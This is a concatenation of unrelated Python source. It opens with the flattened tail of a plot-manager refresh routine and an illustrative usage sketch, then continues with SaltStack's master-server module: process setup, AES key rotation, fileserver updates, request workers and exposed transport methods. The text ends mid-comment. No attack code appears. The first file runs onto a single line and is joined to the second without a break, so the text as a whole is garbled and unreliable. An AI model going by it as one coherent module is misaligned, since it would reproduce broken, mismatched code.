except Exception as e: tb = traceback.format_exc() log.error(f"Failed to open file {file_path}. {e} {tb}") self.failed_to_open_filenames[file_path] = int(time.time()) return None log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}") if self.show_memo: plot_memo: bytes32 if pool_contract_puzzle_hash is None: plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk) else: plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk) plot_memo_str: str = plot_memo.hex() log.info(f"Memo: {plot_memo_str}") return new_plot_info with self, ThreadPoolExecutor() as executor: plots_refreshed: Dict[Path, PlotInfo] = {} for new_plot in executor.map(process_file, plot_paths): if new_plot is not None: plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot self.plots.update(plots_refreshed) result.duration = time.time() - start_time self.log.debug( f"refresh_batch: loaded {result.loaded}, " f"removed {result.removed}, processed {result.processed}, " f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, " f"duration: {result.duration:.2f} seconds" ) return result
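# ---------------------------------------------------------------------------
# Usage sketch (added for illustration; not part of the original module).
# It assumes a plot directory has been configured under ROOT and that real
# farmer/pool keys are available; ROOT and on_refresh are hypothetical names.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    ROOT = Path("/tmp/taco-root")  # hypothetical root path

    def on_refresh(event: PlotRefreshEvents, result: PlotRefreshResult) -> None:
        # _refresh_task reports started / batch_processed / done events here.
        log.info(
            "%s: loaded=%d removed=%d processed=%d remaining=%d (%.2fs)",
            event.name, result.loaded, result.removed,
            result.processed, result.remaining, result.duration,
        )

    manager = PlotManager(ROOT, refresh_callback=on_refresh)
    manager.set_public_keys([], [])  # normally lists of farmer/pool G1Elements
    manager.start_refreshing()       # loads the disk cache and starts the scan thread
    time.sleep(5)                    # allow at least one refresh cycle to run
    manager.stop_refreshing()        # joins the background refresh thread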
master.py
# -*- coding: utf-8 -*- ''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python libs from __future__ import absolute_import, with_statement, print_function, unicode_literals import copy import ctypes import functools import os import re import sys import time import signal import stat import logging import collections import multiprocessing import threading import salt.serializers.msgpack # pylint: disable=import-error,no-name-in-module,redefined-builtin from salt.ext import six from salt.ext.six.moves import range from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO # pylint: enable=import-error,no-name-in-module,redefined-builtin import salt.ext.tornado.gen # pylint: disable=F0401 # Import salt libs import salt.crypt import salt.cli.batch_async import salt.client import salt.client.ssh.client import salt.exceptions import salt.payload import salt.pillar import salt.state import salt.runner import salt.auth import salt.wheel import salt.minion import salt.key import salt.acl import salt.engines import salt.daemons.masterapi import salt.defaults.exitcodes import salt.transport.server import salt.log.setup import salt.utils.args import salt.utils.atomicfile import salt.utils.crypt import salt.utils.event import salt.utils.files import salt.utils.gitfs import salt.utils.gzip_util import salt.utils.jid import salt.utils.job import salt.utils.master import salt.utils.minions import salt.utils.platform import salt.utils.process import salt.utils.schedule import salt.utils.ssdp import salt.utils.stringutils import salt.utils.user import salt.utils.verify import salt.utils.zeromq from salt.config import DEFAULT_INTERVAL from salt.defaults import DEFAULT_TARGET_DELIM from salt.transport import iter_transport_opts from salt.utils.debug import ( enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack ) from salt.utils.event import tagify from salt.utils.odict import OrderedDict try: import resource HAS_RESOURCE = True except ImportError: # resource is not available on windows HAS_RESOURCE = False # Import halite libs try: import halite # pylint: disable=import-error HAS_HALITE = True except ImportError: HAS_HALITE = False from salt.ext.tornado.stack_context import StackContext from salt.utils.ctx import RequestContext log = logging.getLogger(__name__) class SMaster(object): ''' Create a simple salt-master, this will generate the top-level master ''' secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION} def __init__(self, opts): ''' Create a salt master server instance :param dict opts: The salt options dictionary ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. 
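    # Rough sketch of that round trip (illustrative only, not in the original
    # source): multiprocessing on Windows does roughly
    #     state = smaster.__getstate__()
    #     # -> {'opts': ..., 'master_key': ..., 'key': ..., 'secrets': SMaster.secrets}
    # in the parent, then in the spawned child
    #     child = SMaster.__new__(SMaster)
    #     child.__setstate__(state)
    # which restores the class-level SMaster.secrets mapping before it is used.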
def __setstate__(self, state): self.opts = state['opts'] self.master_key = state['master_key'] self.key = state['key'] SMaster.secrets = state['secrets'] def __getstate__(self): return {'opts': self.opts, 'master_key': self.master_key, 'key': self.key, 'secrets': SMaster.secrets} def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. ''' return salt.daemons.masterapi.access_keys(self.opts) class Maintenance(salt.utils.process.SignalHandlingProcess): ''' A generalized maintenance process which performs maintenance routines. ''' def __init__(self, opts, **kwargs): ''' Create a maintenance instance :param dict opts: The salt options ''' super(Maintenance, self).__init__(**kwargs) self.opts = opts # How often do we perform the maintenance tasks self.loop_interval = int(self.opts['loop_interval']) # Track key rotation intervals self.rotate = int(time.time()) # A serializer for general maint operations self.serial = salt.payload.Serial(self.opts) # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['opts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) def __getstate__(self): return { 'opts': self.opts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _post_fork_init(self): ''' Some things need to be init'd after the fork has completed The easiest example is that one of these module types creates a thread in the parent process, then once the fork happens you'll start getting errors like "WARNING: Mixing fork() and threads detected; memory leaked." ''' # Load Runners ropts = dict(self.opts) ropts['quiet'] = True runner_client = salt.runner.RunnerClient(ropts) # Load Returners self.returners = salt.loader.returners(self.opts, {}) # Init Scheduler self.schedule = salt.utils.schedule.Schedule(self.opts, runner_client.functions_dict(), returners=self.returners) self.ckminions = salt.utils.minions.CkMinions(self.opts) # Make Event bus for firing self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Init any values needed by the git ext pillar self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts) self.presence_events = False if self.opts.get('presence_events', False): tcp_only = True for transport, _ in iter_transport_opts(self.opts): if transport != 'tcp': tcp_only = False if not tcp_only: # For a TCP only transport, the presence events will be # handled in the transport code. self.presence_events = True def run(self): ''' This is the general passive maintenance process controller for the Salt master. This is where any data that needs to be cleanly maintained from the master is maintained. 
''' salt.utils.process.appendproctitle(self.__class__.__name__) # init things that need to be done after the process is forked self._post_fork_init() # Make Start Times last = int(time.time()) last_git_pillar_update = last git_pillar_update_interval = self.opts.get('git_pillar_update_interval', 0) old_present = set() while True: now = int(time.time()) if (now - last) >= self.loop_interval: salt.daemons.masterapi.clean_old_jobs(self.opts) salt.daemons.masterapi.clean_expired_tokens(self.opts) salt.daemons.masterapi.clean_pub_auth(self.opts) if (now - last_git_pillar_update) >= git_pillar_update_interval: last_git_pillar_update = now self.handle_git_pillar() self.handle_schedule() self.handle_key_cache() self.handle_presence(old_present) self.handle_key_rotate(now) salt.utils.verify.check_max_open_files(self.opts) last = now time.sleep(self.loop_interval) def handle_key_cache(self): ''' Evaluate accepted keys and create a msgpack file which contains a list ''' if self.opts['key_cache'] == 'sched': keys = [] #TODO DRY from CKMinions if self.opts['transport'] in ('zeromq', 'tcp'): acc = 'minions' else: acc = 'accepted' for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)): if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)): keys.append(fn_) log.debug('Writing master key cache') # Write a temporary file securely if six.PY2: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file: self.serial.dump(keys, cache_file) else: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache'), mode='wb') as cache_file: self.serial.dump(keys, cache_file) def handle_key_rotate(self, now): ''' Rotate the AES key rotation ''' to_rotate = False dfn = os.path.join(self.opts['cachedir'], '.dfn') try: stats = os.stat(dfn) # Basic Windows permissions don't distinguish between # user/group/all. Check for read-only state instead. if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): to_rotate = True # Cannot delete read-only files on Windows. 
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) elif stats.st_mode == 0o100400: to_rotate = True else: log.error('Found dropfile with incorrect permissions, ignoring...') os.remove(dfn) except os.error: pass if self.opts.get('publish_session'): if now - self.rotate >= self.opts['publish_session']: to_rotate = True if to_rotate: log.info('Rotating master AES key') for secret_key, secret_map in six.iteritems(SMaster.secrets): # should be unnecessary-- since no one else should be modifying with secret_map['secret'].get_lock(): secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']()) self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key') self.rotate = now if self.opts.get('ping_on_rotate'): # Ping all minions to get them to pick up the new key log.debug('Pinging all connected minions ' 'due to key rotation') salt.utils.master.ping_all_connected_minions(self.opts) def handle_git_pillar(self): ''' Update git pillar ''' try: for pillar in self.git_pillar: pillar.fetch_remotes() except Exception as exc: # pylint: disable=broad-except log.error('Exception caught while updating git_pillar', exc_info=True) def handle_schedule(self): ''' Evaluate the scheduler ''' try: self.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if self.schedule.loop_interval < self.loop_interval: self.loop_interval = self.schedule.loop_interval except Exception as exc: # pylint: disable=broad-except log.error('Exception %s occurred in scheduled job', exc) self.schedule.cleanup_subprocesses() def handle_presence(self, old_present): ''' Fire presence events if enabled ''' # On the first run it may need more time for the EventPublisher # to come up and be ready. Set the timeout to account for this. if self.presence_events and self.event.connect_pull(timeout=3): present = self.ckminions.connected_ids() new = present.difference(old_present) lost = old_present.difference(present) if new or lost: # Fire new minions present event data = {'new': list(new), 'lost': list(lost)} self.event.fire_event(data, tagify('change', 'presence')) data = {'present': list(present)} self.event.fire_event(data, tagify('present', 'presence')) old_present.clear() old_present.update(present) class FileserverUpdate(salt.utils.process.SignalHandlingProcess): ''' A process from which to update any dynamic fileserver backends ''' def __init__(self, opts, **kwargs): super(FileserverUpdate, self).__init__(**kwargs) self.opts = opts self.update_threads = {} # Avoid circular import import salt.fileserver self.fileserver = salt.fileserver.Fileserver(self.opts) self.fill_buckets() # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['opts'], log_queue=state['log_queue'], ) def __getstate__(self): return {'opts': self.opts, 'log_queue': self.log_queue, } def fill_buckets(self): ''' Get the configured backends and the intervals for any backend which supports them, and set up the update "buckets". There will be one bucket for each thing being updated at a given interval. 
''' update_intervals = self.fileserver.update_intervals() self.buckets = {} for backend in self.fileserver.backends(): fstr = '{0}.update'.format(backend) try: update_func = self.fileserver.servers[fstr] except KeyError: log.debug( 'No update function for the %s filserver backend', backend ) continue if backend in update_intervals: # Variable intervals are supported for this backend for id_, interval in six.iteritems(update_intervals[backend]): if not interval: # Don't allow an interval of 0 interval = DEFAULT_INTERVAL log.debug( 'An update_interval of 0 is not supported, ' 'falling back to %s', interval ) i_ptr = self.buckets.setdefault(interval, OrderedDict()) # Backend doesn't technically need to be present in the # key, all we *really* need is the function reference, but # having it there makes it easier to provide meaningful # debug logging in the update threads. i_ptr.setdefault((backend, update_func), []).append(id_) else: # Variable intervals are not supported for this backend, so # fall back to the global interval for that fileserver. Since # this backend doesn't support variable updates, we have # nothing to pass to the backend's update func, so we'll just # set the value to None. try: interval_key = '{0}_update_interval'.format(backend) interval = self.opts[interval_key] except KeyError: interval = DEFAULT_INTERVAL log.warning( '%s key missing from configuration. Falling back to ' 'default interval of %d seconds', interval_key, interval ) self.buckets.setdefault( interval, OrderedDict())[(backend, update_func)] = None def update_fileserver(self, interval, backends): ''' Threading target which handles all updates for a given wait interval ''' def _do_update(): log.debug( 'Performing fileserver updates for items with an update ' 'interval of %d', interval ) for backend, update_args in six.iteritems(backends): backend_name, update_func = backend try: if update_args: log.debug( 'Updating %s fileserver cache for the following ' 'targets: %s', backend_name, update_args ) args = (update_args,) else: log.debug('Updating %s fileserver cache', backend_name) args = () update_func(*args) except Exception as exc: # pylint: disable=broad-except log.exception( 'Uncaught exception while updating %s fileserver ' 'cache', backend_name ) log.debug( 'Completed fileserver updates for items with an update ' 'interval of %d, waiting %d seconds', interval, interval ) condition = threading.Condition() _do_update() while True: with condition: condition.wait(interval) _do_update() def run(self): ''' Start the update threads ''' salt.utils.process.appendproctitle(self.__class__.__name__) # Clean out the fileserver backend cache salt.daemons.masterapi.clean_fsbackend(self.opts) for interval in self.buckets: self.update_threads[interval] = threading.Thread( target=self.update_fileserver, args=(interval, self.buckets[interval]), ) self.update_threads[interval].start() # Keep the process alive while True: time.sleep(60) class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance :param dict: The salt options ''' if zmq and ZMQ_VERSION_INFO < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' 
) SMaster.__init__(self, opts) def __set_max_open_files(self): if not HAS_RESOURCE: return # Let's check to see how our max open files(ulimit -n) setting is mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) if mof_h == resource.RLIM_INFINITY: # Unclear what to do with infinity... macOS reports RLIM_INFINITY as # hard limit,but raising to anything above soft limit fails... mof_h = mof_s log.info( 'Current values for max open files soft/hard setting: %s/%s', mof_s, mof_h ) # Let's grab, from the configuration file, the value to raise max open # files to mof_c = self.opts['max_open_files'] if mof_c > mof_h: # The configured value is higher than what's allowed log.info( 'The value for the \'max_open_files\' setting, %s, is higher ' 'than the highest value the user running salt is allowed to ' 'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h ) mof_c = mof_h if mof_s < mof_c: # There's room to raise the value. Raise it! log.info('Raising max open files value to %s', mof_c) resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h)) try: mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) log.info( 'New values for max open files soft/hard values: %s/%s', mof_s, mof_h ) except ValueError: # https://github.com/saltstack/salt/issues/1991#issuecomment-13025595 # A user under macOS reported that our 100000 default value is # still too high. log.critical( 'Failed to raise max open files setting to %s. If this ' 'value is too low, the salt-master will most likely fail ' 'to run properly.', mof_c ) def _pre_flight(self): ''' Run pre flight checks. If anything in this method fails then the master should not start up. ''' errors = [] critical_errors = [] try: os.chdir('/') except OSError as err: errors.append( 'Cannot change to root directory ({0})'.format(err) ) if self.opts.get('fileserver_verify_config', True): # Avoid circular import import salt.fileserver fileserver = salt.fileserver.Fileserver(self.opts) if not fileserver.servers: errors.append( 'Failed to load fileserver backends, the configured backends ' 'are: {0}'.format(', '.join(self.opts['fileserver_backend'])) ) else: # Run init() for all backends which support the function, to # double-check configuration try: fileserver.init() except salt.exceptions.FileserverConfigError as exc: critical_errors.append('{0}'.format(exc)) if not self.opts['fileserver_backend']: errors.append('No fileserver backends are configured') # Check to see if we need to create a pillar cache dir if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')): try: with salt.utils.files.set_umask(0o077): os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache')) except OSError: pass if self.opts.get('git_pillar_verify_config', True): try: git_pillars = [ x for x in self.opts.get('ext_pillar', []) if 'git' in x and not isinstance(x['git'], six.string_types) ] except TypeError: git_pillars = [] critical_errors.append( 'Invalid ext_pillar configuration. It is likely that the ' 'external pillar type was not specified for one or more ' 'external pillars.' 
) if git_pillars: try: new_opts = copy.deepcopy(self.opts) import salt.pillar.git_pillar for repo in git_pillars: new_opts['ext_pillar'] = [repo] try: git_pillar = salt.utils.gitfs.GitPillar( new_opts, repo['git'], per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES, per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY, global_only=salt.pillar.git_pillar.GLOBAL_ONLY) except salt.exceptions.FileserverConfigError as exc: critical_errors.append(exc.strerror) finally: del new_opts if errors or critical_errors: for error in errors: log.error(error) for error in critical_errors: log.critical(error) log.critical('Master failed pre flight checks, exiting\n') sys.exit(salt.defaults.exitcodes.EX_GENERIC) def start(self): ''' Turn on the master server components ''' self._pre_flight() log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user()) enable_sigusr1_handler() enable_sigusr2_handler() self.__set_max_open_files() # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): # Setup the secrets here because the PubServerChannel may need # them as well. SMaster.secrets['aes'] = { 'secret': multiprocessing.Array( ctypes.c_char, salt.utils.stringutils.to_bytes( salt.crypt.Crypticle.generate_key_string() ) ), 'reload': salt.crypt.Crypticle.generate_key_string } log.info('Creating master process manager') # Since there are children having their own ProcessManager we should wait for kill more time. self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5) pub_channels = [] log.info('Creating master publisher process') log_queue = salt.log.setup.get_multiprocessing_logging_queue() for _, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.pre_fork(self.process_manager, kwargs={'log_queue': log_queue}) pub_channels.append(chan) log.info('Creating master event publisher process') self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,)) if self.opts.get('reactor'): if isinstance(self.opts['engines'], list): rine = False for item in self.opts['engines']: if 'reactor' in item: rine = True break if not rine: self.opts['engines'].append({'reactor': {}}) else: if 'reactor' not in self.opts['engines']: log.info('Enabling the reactor engine') self.opts['engines']['reactor'] = {} salt.engines.start_engines(self.opts, self.process_manager) # must be after channels log.info('Creating master maintenance process') self.process_manager.add_process(Maintenance, args=(self.opts,)) if self.opts.get('event_return'): log.info('Creating master event return process') self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,)) ext_procs = self.opts.get('ext_processes', []) for proc in ext_procs: log.info('Creating ext_processes process: %s', proc) try: mod = '.'.join(proc.split('.')[:-1]) cls = proc.split('.')[-1] _tmp = __import__(mod, globals(), locals(), [cls], -1) cls = _tmp.__getattribute__(cls) self.process_manager.add_process(cls, args=(self.opts,)) except Exception: # pylint: disable=broad-except log.error('Error creating ext_processes process: %s', proc) if HAS_HALITE and 'halite' in self.opts: log.info('Creating master halite process') self.process_manager.add_process(Halite, args=(self.opts['halite'],)) # TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there) 
if self.opts['con_cache']: log.info('Creating master concache process') self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,)) # workaround for issue #16315, race condition log.debug('Sleeping for two seconds to let concache rest') time.sleep(2) log.info('Creating master request server process') kwargs = {} if salt.utils.platform.is_windows(): kwargs['log_queue'] = log_queue kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level() kwargs['secrets'] = SMaster.secrets self.process_manager.add_process( ReqServer, args=(self.opts, self.key, self.master_key), kwargs=kwargs, name='ReqServer') self.process_manager.add_process( FileserverUpdate, args=(self.opts,)) # Fire up SSDP discovery publisher if self.opts['discovery']: if salt.utils.ssdp.SSDPDiscoveryServer.is_available(): self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer( port=self.opts['discovery']['port'], listen_ip=self.opts['interface'], answer={'mapping': self.opts['discovery'].get('mapping', {})}).run) else: log.error('Unable to load SSDP: asynchronous IO is not available.') if sys.version_info.major == 2: log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.') # Install the SIGINT/SIGTERM handlers if not done so far if signal.getsignal(signal.SIGINT) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGINT, self._handle_signals) if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGTERM, self._handle_signals) self.process_manager.run() def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument # escalate the signals to the process manager self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) # kill any remaining processes self.process_manager.kill_children() time.sleep(1) sys.exit(0) class Halite(salt.utils.process.SignalHandlingProcess): ''' Manage the Halite server ''' def __init__(self, hopts, **kwargs): ''' Create a halite instance :param dict hopts: The halite options ''' super(Halite, self).__init__(**kwargs) self.hopts = hopts # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['hopts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) def __getstate__(self): return { 'hopts': self.hopts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def run(self): ''' Fire up halite! ''' salt.utils.process.appendproctitle(self.__class__.__name__) halite.start(self.hopts) class ReqServer(salt.utils.process.SignalHandlingProcess): ''' Starts up the master request server, minions send results to this interface. ''' def __init__(self, opts, key, mkey, secrets=None, **kwargs): ''' Create a request server :param dict opts: The salt options dictionary :key dict: The user starting the server and the AES key :mkey dict: The user starting the server and the RSA key :rtype: ReqServer :returns: Request server ''' super(ReqServer, self).__init__(**kwargs) self.opts = opts self.master_key = mkey # Prepare the AES key self.key = key self.secrets = secrets # __setstate__ and __getstate__ are only used on Windows. 
# We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['opts'], state['key'], state['mkey'], secrets=state['secrets'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) def __getstate__(self): return { 'opts': self.opts, 'key': self.key, 'mkey': self.master_key, 'secrets': self.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument self.destroy(signum) super(ReqServer, self)._handle_signals(signum, sigframe) def __bind(self): ''' Binds the reply server ''' if self.log_queue is not None: salt.log.setup.set_multiprocessing_logging_queue(self.log_queue) if self.log_queue_level is not None: salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level) salt.log.setup.setup_multiprocessing_logging(self.log_queue) if self.secrets is not None: SMaster.secrets = self.secrets dfn = os.path.join(self.opts['cachedir'], '.dfn') if os.path.isfile(dfn): try: if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): # Cannot delete read-only files on Windows. os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) os.remove(dfn) except os.error: pass # Wait for kill should be less then parent's ProcessManager. self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager', wait_for_kill=1) req_channels = [] tcp_only = True for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.ReqServerChannel.factory(opts) chan.pre_fork(self.process_manager) req_channels.append(chan) if transport != 'tcp': tcp_only = False kwargs = {} if salt.utils.platform.is_windows(): kwargs['log_queue'] = self.log_queue kwargs['log_queue_level'] = self.log_queue_level # Use one worker thread if only the TCP transport is set up on # Windows and we are using Python 2. There is load balancer # support on Windows for the TCP transport when using Python 3. if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1: log.warning('TCP transport supports only 1 worker on Windows ' 'when using Python 2.') self.opts['worker_threads'] = 1 # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): for ind in range(int(self.opts['worker_threads'])): name = 'MWorker-{0}'.format(ind) self.process_manager.add_process(MWorker, args=(self.opts, self.master_key, self.key, req_channels, name), kwargs=kwargs, name=name) self.process_manager.run() def run(self): ''' Start up the ReqServer ''' self.__bind() def destroy(self, signum=signal.SIGTERM): if hasattr(self, 'process_manager'): self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) self.process_manager.kill_children() # pylint: disable=W1701 def __del__(self): self.destroy() # pylint: enable=W1701 class MWorker(salt.utils.process.SignalHandlingProcess): ''' The worker multiprocess instance to manage the backend operations for the salt master. 
''' def __init__(self, opts, mkey, key, req_channels, name, **kwargs): ''' Create a salt master worker process :param dict opts: The salt options :param dict mkey: The user running the salt master and the AES key :param dict key: The user running the salt master and the RSA key :rtype: MWorker :return: Master worker ''' kwargs['name'] = name self.name = name super(MWorker, self).__init__(**kwargs) self.opts = opts self.req_channels = req_channels self.mkey = mkey self.key = key self.k_mtime = 0 self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = time.time() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. def __setstate__(self, state): super(MWorker, self).__init__( log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) self.opts = state['opts'] self.req_channels = state['req_channels'] self.mkey = state['mkey'] self.key = state['key'] self.k_mtime = state['k_mtime'] SMaster.secrets = state['secrets'] def __getstate__(self): return { 'opts': self.opts, 'req_channels': self.req_channels, 'mkey': self.mkey, 'key': self.key, 'k_mtime': self.k_mtime, 'secrets': SMaster.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): for channel in getattr(self, 'req_channels', ()): channel.close() super(MWorker, self)._handle_signals(signum, sigframe) def __bind(self): ''' Bind to the local port ''' # using ZMQIOLoop since we *might* need zmq in there install_zmq() self.io_loop = ZMQDefaultLoop() self.io_loop.make_current() for req_channel in self.req_channels: req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily? 
try: self.io_loop.start() except (KeyboardInterrupt, SystemExit): # Tornado knows what to do pass @salt.ext.tornado.gen.coroutine def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server Example cleartext payload generated for 'salt myminion test.ping': {'enc': 'clear', 'load': {'arg': [], 'cmd': 'publish', 'fun': 'test.ping', 'jid': '', 'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj', 'kwargs': {'show_jid': False, 'show_timeout': False}, 'ret': '', 'tgt': 'myminion', 'tgt_type': 'glob', 'user': 'root'}} :param dict payload: The payload route to the appropriate handler ''' key = payload['enc'] load = payload['load'] ret = {'aes': self._handle_aes, 'clear': self._handle_clear}[key](load) raise salt.ext.tornado.gen.Return(ret) def _post_stats(self, start, cmd): ''' Calculate the master stats and fire events with stat info ''' end = time.time() duration = end - start self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs'] if end - self.stat_clock > self.opts['master_stats_event_iter']: # Fire the event with the stats and wipe the tracker self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 'stats')) self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = end def _handle_clear(self, load): ''' Process a cleartext command :param dict load: Cleartext payload :return: The result of passing the load to a function in ClearFuncs corresponding to the command specified in the load's 'cmd' key. ''' log.trace('Clear payload received with command %s', load['cmd']) cmd = load['cmd'] method = self.clear_funcs.get_method(cmd) if not method: return {}, {'fun': 'send_clear'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 ret = method(load), {'fun': 'send_clear'} if self.opts['master_stats']: self._post_stats(start, cmd) return ret def _handle_aes(self, data): ''' Process a command sent via an AES key :param str load: Encrypted payload :return: The result of passing the load to a function in AESFuncs corresponding to the command specified in the load's 'cmd' key. ''' if 'cmd' not in data: log.error('Received malformed command %s', data) return {} cmd = data['cmd'] log.trace('AES payload received with command %s', data['cmd']) method = self.aes_funcs.get_method(cmd) if not method: return {}, {'fun': 'send'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 def run_func(data): return self.aes_funcs.run_func(data['cmd'], data) with StackContext(functools.partial(RequestContext, {'data': data, 'opts': self.opts})): ret = run_func(data) if self.opts['master_stats']: self._post_stats(start, cmd) return ret def run(self): ''' Start a Master Worker ''' salt.utils.process.appendproctitle(self.name) self.clear_funcs = ClearFuncs( self.opts, self.key, ) self.aes_funcs = AESFuncs(self.opts) salt.utils.crypt.reinit_crypto() self.__bind() class TransportMethods(object): ''' Expose methods to the transport layer, methods with their names found in the class attribute 'expose_methods' will be exposed to the transport layer via 'get_method'. 
''' expose_methods = () def get_method(self, name): ''' Get a method which should be exposed to the transport layer ''' if name in self.expose_methods: try: return getattr(self, name) except AttributeError: log.error("Expose method not found: %s", name) else: log.error("Requested method not exposed: %s", name) # TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests class AESFuncs(TransportMethods): ''' Set up functions that are available when the load is encrypted with AES ''' expose_methods = ( 'verify_minion', '_master_tops', '_ext_nodes', '_master_opts', '_mine_get', '_mine', '_mine_delete', '_mine_flush', '_file_recv', '_pillar', '_minion_event', '_handle_minion_event', '_return', '_syndic_return', 'minion_runner', 'pub_ret', 'minion_pub', 'minion_publish', 'revoke_auth', 'run_func', '_serve_file', '_file_find', '_file_hash', '_file_find_and_stat', '_file_list', '_file_list_emptydirs', '_dir_list', '_symlink_list', '_file_envs', ) def __init__(self, opts): ''' Create a new AESFuncs :param dict opts: The salt options :rtype: AESFuncs :returns: Instance for handling AES operations ''' self.opts = opts self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) self.serial = salt.payload.Serial(opts) self.ckminions = salt.utils.minions.CkMinions(opts) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Create the 